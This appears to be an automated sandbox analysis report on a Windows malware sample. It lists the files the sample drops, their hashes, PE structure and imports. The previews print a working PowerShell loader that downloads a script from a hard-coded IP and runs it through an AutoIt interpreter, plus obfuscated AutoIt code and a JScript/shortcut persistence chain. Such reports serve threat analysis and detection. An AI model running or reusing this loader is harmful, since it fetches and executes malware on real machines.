                                                                    SHA-256:FE548F606767F1EDFE74581C309ABE78449F4B5F15DF257A63A24C9F1FAD6230
                                                                    SHA-512:DAD38E0FD48C32B1055DD51EB926C0E050A1D21185D5D5E7D1F7655BDB30C495D4E9CD7BCF3B9D61571B8CF31B71BD8CA4C0F8B639468361A51437BD593092D3
                                                                    Malicious:false
                                                                    Preview:n@\.... .......7.......X\...;...{......................0.e......!...{?.4....|-.h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{......................................4....|M..................uup4....|-..........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):16384
                                                                    Entropy (8bit):0.07778014207454474
                                                                    Encrypted:false
                                                                    SSDEEP:3:B2l8YemkItKg3NaAPaU1l/+33I//lAlluxmO+l/SNxOf:U8zPANDPaU4oAgmOH
                                                                    MD5:50F4BC925A483C75C787B27E88683148
                                                                    SHA1:596DD955656A5FCBD3529E2A3EFFAAA4198C7120
                                                                    SHA-256:EE9DACF4E2DE9F8EE380BD832C15850B5F07040E546BC28F689797D0D3E4B547
                                                                    SHA-512:30203E7DA60F16CE0907D0537B23835625806B9102471BF423440103D9A35F85EFF0B0CED6B4E65CCD5A8FFFA250ADDA59A20A27B0916027692052876CECB743
                                                                    Malicious:false
                                                                    Preview:..V.....................................;...{..4....|-..!...{?..........!...{?..!...{?..g...!...{?..................uup4....|-.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):893608
                                                                    Entropy (8bit):6.62028134425878
                                                                    Encrypted:false
                                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Joe Sandbox View:
                                                                    • Filename: duyba.lnk.download.lnk, Detection: malicious, Browse
                                                                    • Filename: pt8GJiNZDT.exe, Detection: malicious, Browse
                                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                                    • Filename: c2.hta, Detection: malicious, Browse
                                                                    • Filename: FwR7as4xUq.exe, Detection: malicious, Browse
                                                                    • Filename: InsertSr.exe, Detection: malicious, Browse
                                                                    • Filename: vqMMwqCFZQ.exe, Detection: malicious, Browse
                                                                    • Filename: fT0L8msd6q.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\PPbimZI4LV.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):486
                                                                    Entropy (8bit):5.285750251320951
                                                                    Encrypted:false
                                                                    SSDEEP:12:f73/oq0FEoFnV/9LBzFj0zUQbnRS6SxJMnCPTFM:f73//0CknZ9LzjYnRSb8Cba
                                                                    MD5:AA95E0199F34D4DF6435F1355734CF85
                                                                    SHA1:C7FBE30F45BEF5B44F33FCFAA43F2D12ACA8B34E
                                                                    SHA-256:79D76D69C3FBD6E210FF3A63A575B3CBBD09812446DD2B29BE44B6E9558C0C6A
                                                                    SHA-512:B5A69C9954CA9E0D371942BAA63D66450090AE11DA9CBC2F7B429FACA824D3C10DFDA9584192C59DE940E548883DBF816A128989DE4757B62DE421C14144CE72
                                                                    Malicious:true
                                                                    Preview:[string]$fU5L = "http://139.99.188.124/BlQMSgJx.txt"..[string]$oF6L = "C:\Users\Public\Secure.au3"..[string]$exePath = "C:\Users\Public\Guard.exe"....# Download the content from the URL..$wResp = New-Object System.Net.WebClient..$fCont = $wResp.DownloadString($fU5L)....# Save the downloaded content to the output file..Set-Content -Path $oF6L -Value $fCont -Encoding UTF8....# Run the executable with the output file as an argument..Start-Process -FilePath $exePath -ArgumentList $oF6L
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (1266)
                                                                    Category:dropped
                                                                    Size (bytes):1241207
                                                                    Entropy (8bit):5.144245135598002
                                                                    Encrypted:false
                                                                    SSDEEP:12288:28V+jcfSP7IkI/w9nx3EBbKBLtKMGFSbri2d:qcmx3amBRPbr5
                                                                    MD5:C721A93515EB1964215E0FFC37F2C7BD
                                                                    SHA1:F3D1EC4B6AC8FAC24CCDBB9F75366F820684171E
                                                                    SHA-256:E854405853875599752ED08E4683D578DE11C94C03AB048B2151ECA6AD93D911
                                                                    SHA-512:0BBC3C7F67081C6A4F53534C69F58E6164ABF1CDE8A4D44C7B19F9B4E5567C2819A5B6142AC468499D68ABB52F36B4AED9BB7D4B3F7BBEC8D263E0A0AA6B7970
                                                                    Malicious:true
                                                                    Preview:.Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):64
                                                                    Entropy (8bit):0.34726597513537405
                                                                    Encrypted:false
                                                                    SSDEEP:3:Nlll:Nll
                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                    Malicious:false
                                                                    Preview:@...e...........................................................
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):60
                                                                    Entropy (8bit):4.038920595031593
                                                                    Encrypted:false
                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                    Malicious:false
                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                    Process:C:\Users\Public\Guard.exe
                                                                    File Type:ASCII text, with very long lines (1266)
                                                                    Category:dropped
                                                                    Size (bytes):1241204
                                                                    Entropy (8bit):5.144205154030587
                                                                    Encrypted:false
                                                                    SSDEEP:12288:D8V+jcfSP7IkI/w9nx3EBbKBLtKMGFSbri2d:Dcmx3amBRPbr5
                                                                    MD5:31D42ADDDD78A4B96BA7D0DB076E3994
                                                                    SHA1:6CE4AECB7419AA163ECDE7594FFAB9DF36A69A8D
                                                                    SHA-256:D79DA7F014F096CCC2719B6BC94CF446C6C98EAF98C2A6EA23CCD7EBDEE933ED
                                                                    SHA-512:7BC1BD0A7ADA641DC758073375C0595E1276F51BD65185731584FE06CE82EC296A8B85385B863AB7B2DADF0FE22B1D293C9647565EBC9641FE49D30FE8B5E7E7
                                                                    Malicious:false
                                                                    Preview:Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines).$PdBlocksResponseDat = '739119618772'.$VerifiedUnderstoodValidation = 34.$iosymphonyseemscrucial = 50.For $OdHBt = 28 To 865.If $VerifiedUnderstoodValidation = 32 Then.Sqrt(7955).FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 33 Then.ConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5)).DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2)).Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1)).$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1.EndIf.If $VerifiedUnderstoodValidation = 34 Then.$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]
                                                                    Process:C:\Users\Public\Guard.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:dropped
                                                                    Size (bytes):190
                                                                    Entropy (8bit):4.702878525317735
                                                                    Encrypted:false
                                                                    SSDEEP:3:RiMIpGXfeNH5E5wWAX+eLCMuL4EkD5yKXW/Zi+0/RaMl85uWAX+eLCMuL4EkD5yn:RiJbNHCwWDeLPqJkDrXW/Zz0tl8wWDek
                                                                    MD5:ADD89CDE8D0D8247BA4058565F6AF1D1
                                                                    SHA1:BDE05EE487B598FC744EBE571202C8BDED415560
                                                                    SHA-256:49456CC7BEEF073EF45D3F3CA43AFFFB39A1885C386F8C24C29A7F3AA86A19AB
                                                                    SHA-512:15E9AB5071BB27D81BC6356AEA39BBD4F07C554E25B1984BE524DDDC86DC861950F5E18237D33A56A2397E30D700BFF22B338CE4F9B596A0F5BDD600A2F6E3DA
                                                                    Malicious:true
                                                                    Preview:new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\user\\AppData\\Local\\WordGenius Technologies\\G\"")
                                                                    Process:C:\Users\Public\Guard.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):893608
                                                                    Entropy (8bit):6.62028134425878
                                                                    Encrypted:false
                                                                    SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                                                    MD5:18CE19B57F43CE0A5AF149C96AECC685
                                                                    SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                                                    SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                                                    SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 8%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >), ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):101
                                                                    Entropy (8bit):4.882484479599994
                                                                    Encrypted:false
                                                                    SSDEEP:3:HRAbABGQaFyw3pYoN+E2J5yKXW/Zi+URAAy:HRYF5yjoN723yKXW/Zzyy
                                                                    MD5:E13AD229D874CB584EE9C5EAF00F02A5
                                                                    SHA1:99EFF6F0EFC61DCFDD83E19A7A88355E8D82BF77
                                                                    SHA-256:7448CB3A6A286F6BDF4F036DEAB44060B5E1E17368D2E1C560CCA5EEFEF342A1
                                                                    SHA-512:DB00B1447019348D5D90A1BD0A5E30FF60D0ED92E3308418B659D7B8B5796A04D4CF371D6824574E84F1ACB8D1CFC193E4B7F8EC3EE93862FF6F4C01012BD801
                                                                    Malicious:true
                                                                    Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" ..
                                                                    Process:C:\Windows\System32\svchost.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):55
                                                                    Entropy (8bit):4.306461250274409
                                                                    Encrypted:false
                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                    Malicious:false
                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                    Entropy (8bit):6.306442792199625
                                                                    TrID:
                                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:PPbimZI4LV.exe
                                                                    File size:1'083'904 bytes
                                                                    MD5:a9e7a83dd50b78bad39a2a57cbebb137
                                                                    SHA1:c8634886fe1f814033d5303a29ed28909b8cea91
                                                                    SHA256:3e60030e11271225fcc4e95aeb70447577882c697b54eeb83d5b6957b9c4bda3
                                                                    SHA512:8d34ebb520e3d548e803c57ed85238cb4bab33b67098ea5f45de97cc43693566050181eccc8370df0bcb4f5c64a09ea3a876f2a64236f7c4c87fa62b28d1099e
                                                                    SSDEEP:24576:OrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9Tva91w:O2EYTb8atv1orq+pEiSDTj1VyvBar
                                                                    TLSH:46357C4973A4419DFEABE1B6CA23C607D6B17C490276861F01A47B767F337712A2E321
                                                                    File Content Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG.....>PG......PG......PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(..#PG."(..*PG."(...PG.+PF..RG..9I.{PG..9D.*PG..9..*PG
                                                                    Icon Hash:0fd88dc89ea7861b
                                                                    Entrypoint:0x14002549c
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x140000000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x674F007A [Tue Dec 3 12:58:34 2024 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:5
                                                                    OS Version Minor:2
                                                                    File Version Major:5
                                                                    File Version Minor:2
                                                                    Subsystem Version Major:5
                                                                    Subsystem Version Minor:2
                                                                    Import Hash:fadc5a257419d2541a6b13dfb5e311e2
                                                                    Instruction
                                                                    dec eax
                                                                    sub esp, 28h
                                                                    call 00007F7070B3B130h
                                                                    dec eax
                                                                    add esp, 28h
                                                                    jmp 00007F7070B3AA3Fh
                                                                    int3
                                                                    int3
                                                                    inc eax
                                                                    push ebx
                                                                    dec eax
                                                                    sub esp, 20h
                                                                    dec eax
                                                                    mov ebx, ecx
                                                                    dec eax
                                                                    mov eax, edx
                                                                    dec eax
                                                                    lea ecx, dword ptr [0009466Dh]
                                                                    dec eax
                                                                    mov dword ptr [ebx], ecx
                                                                    dec eax
                                                                    lea edx, dword ptr [ebx+08h]
                                                                    xor ecx, ecx
                                                                    dec eax
                                                                    mov dword ptr [edx], ecx
                                                                    dec eax
                                                                    mov dword ptr [edx+08h], ecx
                                                                    dec eax
                                                                    lea ecx, dword ptr [eax+08h]
                                                                    call 00007F7070B3C649h
                                                                    dec eax
                                                                    lea eax, dword ptr [0009467Dh]
                                                                    dec eax
                                                                    mov dword ptr [ebx], eax
                                                                    dec eax
                                                                    mov eax, ebx
                                                                    dec eax
                                                                    add esp, 20h
                                                                    pop ebx
                                                                    ret
                                                                    int3
                                                                    dec eax
                                                                    and dword ptr [ecx+10h], 00000000h
                                                                    dec eax
                                                                    lea eax, dword ptr [00094674h]
                                                                    dec eax
                                                                    mov dword ptr [ecx+08h], eax
                                                                    dec eax
                                                                    lea eax, dword ptr [00094659h]
                                                                    dec eax
                                                                    mov dword ptr [ecx], eax
                                                                    dec eax
                                                                    mov eax, ecx
                                                                    ret
                                                                    int3
                                                                    int3
                                                                    inc eax
                                                                    push ebx
                                                                    dec eax
                                                                    sub esp, 20h
                                                                    dec eax
                                                                    mov ebx, ecx
                                                                    dec eax
                                                                    mov eax, edx
                                                                    dec eax
                                                                    lea ecx, dword ptr [0009460Dh]
                                                                    dec eax
                                                                    mov dword ptr [ebx], ecx
                                                                    dec eax
                                                                    lea edx, dword ptr [ebx+08h]
                                                                    xor ecx, ecx
                                                                    dec eax
                                                                    mov dword ptr [edx], ecx
                                                                    dec eax
                                                                    mov dword ptr [edx+08h], ecx
                                                                    dec eax
                                                                    lea ecx, dword ptr [eax+08h]
                                                                    call 00007F7070B3C5E9h
                                                                    dec eax
                                                                    lea eax, dword ptr [00094645h]
                                                                    dec eax
                                                                    mov dword ptr [ebx], eax
                                                                    dec eax
                                                                    mov eax, ebx
                                                                    dec eax
                                                                    add esp, 20h
                                                                    pop ebx
                                                                    ret
                                                                    int3
                                                                    dec eax
                                                                    and dword ptr [ecx+10h], 00000000h
                                                                    dec eax
                                                                    lea eax, dword ptr [0009463Ch]
                                                                    dec eax
                                                                    mov dword ptr [ecx+08h], eax
                                                                    dec eax
                                                                    lea eax, dword ptr [00000021h]
                                                                    Programming Language:
                                                                    • [ C ] VS2008 SP1 build 30729
                                                                    • [IMP] VS2008 SP1 build 30729
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xe5c100x17c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xfb0000x140f4.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0xf40000x6f48.pdata
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1100000xa74.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0xc70500x1c.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0xd9aa00x28.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xc70700x100.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xb50000x1138.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000xb33280xb3400507a8505198e35cc9675301d53e3b1c4False0.5503358721234309data6.5212967575920215IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .rdata0xb50000x342040x344009eda36be0cf076085a2f9772c1ee5803False0.30884139503588515data5.360588077813426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .data0xea0000x91200x5000ec6b77d6ef8898b0d3b7d48c042d66a0False0.040673828125DOS executable (block device driver)0.5749243362866429IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .pdata0xf40000x6f480x70004416e27f8be9f9271c439d2fd34d1b2dFalse0.49612862723214285data5.911479421450324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .rsrc0xfb0000x140f40x1420003206aeaa57454f7e12edff9a0f98715False0.193359375data4.245963827119573IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x1100000xa740xc005ddb0e422ace102fe530e589a0cbec6fFalse0.4850260416666667data5.139847116863034IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_ICON0xfb4580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                    RT_ICON0xfb5800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                    RT_ICON0xfb6a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                    RT_ICON0xfb7d00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 60472 x 60472 px/mEnglishGreat Britain0.14468236129184905
                                                                    RT_MENU0x10bff80x50dataEnglishGreat Britain0.9
                                                                    RT_STRING0x10c0480x594dataEnglishGreat Britain0.3333333333333333
                                                                    RT_STRING0x10c5dc0x68adataEnglishGreat Britain0.2735961768219833
                                                                    RT_STRING0x10cc680x490dataEnglishGreat Britain0.3715753424657534
                                                                    RT_STRING0x10d0f80x5fcdataEnglishGreat Britain0.3087467362924282
                                                                    RT_STRING0x10d6f40x65cdataEnglishGreat Britain0.34336609336609336
                                                                    RT_STRING0x10dd500x466dataEnglishGreat Britain0.3605683836589698
                                                                    RT_STRING0x10e1b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                    RT_RCDATA0x10e3100x8c6data1.0048975957257347
                                                                    RT_GROUP_ICON0x10ebd80x14dataEnglishGreat Britain1.25
                                                                    RT_GROUP_ICON0x10ebec0x14dataEnglishGreat Britain1.25
                                                                    RT_GROUP_ICON0x10ec000x14dataEnglishGreat Britain1.15
                                                                    RT_GROUP_ICON0x10ec140x14dataEnglishGreat Britain1.25
                                                                    RT_VERSION0x10ec280xdcdataEnglishGreat Britain0.6181818181818182
                                                                    RT_MANIFEST0x10ed040x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
                                                                    DLLImport
                                                                    WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                                    MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                                    WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                                    PSAPI.DLLGetProcessMemoryInfo
                                                                    IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                                    USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                                    UxTheme.dllIsThemeActive
